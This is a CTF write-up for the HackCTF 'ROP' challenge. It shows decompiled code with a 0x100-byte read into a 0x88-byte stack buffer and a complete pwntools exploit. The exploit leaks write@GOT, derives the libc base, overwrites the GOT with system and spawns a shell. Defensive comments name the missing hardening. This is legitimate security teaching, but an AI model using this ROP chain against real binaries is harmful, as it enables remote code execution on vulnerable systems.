Hackctf Rop Writeup

LeeDoHyun · January 26, 2020

#HackCTF ROP

친절하게 vulnerable_function에 취약점이 터지는 것을 알려줍니다.

// Decompiler output of the challenge's vulnerable function.
// buf starts 0x88 bytes below the saved ebp, yet read() may deliver up to
// 0x100 bytes, so anything past the first 0x88 bytes of input overwrites
// the saved frame pointer and the return address (stack buffer overflow).
// The fix is a read bounded by the real buffer size (and a stack canary
// would at least turn the overflow into a crash instead of control-flow hijack).
ssize_t vulnerable_function()
{
  char buf; // [esp+0h] [ebp-88h] -- shown as one char; the frame offset is what matters

  return read(0, &buf, 0x100u); // 0x100 > 0x88: unbounded read into a fixed stack slot
}

pppr, bss, write_plt, write_got, read_plt 구해서 익스 짜주면 됩니다.

exploit.py

from pwn import *

# Defender's note: this chain presumably relies on three missing hardenings --
# no stack canary (the overflow returns cleanly), a non-PIE binary (every
# address below is absolute) and a writable GOT (stage 2 patches it).
# -fstack-protector, PIE and full RELRO (-z relro -z now) each remove one.

# Log every byte sent/received; useful when one stage of the chain misbehaves.
context.log_level = "debug"
# Challenge endpoint. The port is a str; pwntools appears to coerce it, but an
# int literal is the conventional form.
IP = "ctf.j0n9hyun.xyz"
PORT = "3021"
r = remote(IP, PORT)
#r = process("./rop")
# The challenge binary and the libc shipped with it. libc is only used for
# symbol offsets (see the base computation below), never loaded locally.
e = ELF("./rop")
libc = ELF("libc.so.6")

# Hard-coded gadget address, presumably pop;pop;pop;ret (the name and its use
# after every 3-argument call below suggest so) -- verify against the binary.
pppr = 0x8048509
# Writable scratch area at a fixed address; stage 3 stores "/bin/sh" here.
bss = e.bss()
write_plt = e.plt["write"]
write_got = e.got["write"]
read_plt = e.plt["read"]
# 8 bytes including the NUL; matches the read(0, bss, 8) stage below.
binsh = "/bin/sh\x00"

# NOTE(review): Python 2 style -- str concatenated with p32() output. Under
# Python 3 pwntools, p32() returns bytes and "A"*140 + p32(...) raises TypeError.
# 140 = 0x88 (buf at ebp-0x88 in the decompiled function) + 4 (saved ebp),
# so the next dword lands on the saved return address.
payload = "A"*140
# Stage 1: write(1, write_got, 4) -- leak the resolved libc address of write().
payload += p32(write_plt) + p32(pppr) + p32(1) + p32(write_got) + p32(4)
# Stage 2: read(0, write_got, 4) -- overwrite write's GOT entry with the
# 4 bytes sent later (p32(system)). Only possible because the GOT is writable.
payload += p32(read_plt) + p32(pppr) + p32(0) + p32(write_got) + p32(4)
# Stage 3: read(0, bss, 8) -- store the "/bin/sh" string sent later in .bss.
payload += p32(read_plt) + p32(pppr) + p32(0) + p32(bss) + p32(8)
# Stage 4: write@plt now dispatches through the patched GOT entry, i.e. it
# ends up as system(bss); "aaaa" is the (never used) return address.
payload += p32(write_plt) + "aaaa" + p32(bss)
r.send(payload)

# Consume the 4 leaked bytes from stage 1 and derive the libc base from
# write()'s offset in the provided libc; then locate system() the same way.
write = u32(r.recv(4))
base = write - libc.symbols["write"]
system = base + libc.symbols["system"]

# Feed stages 2 and 3 in order: each send is consumed by the matching read()
# in the chain (4 bytes into the GOT, then 8 bytes into .bss).
r.send(p32(system))
r.send(binsh)
r.interactive()
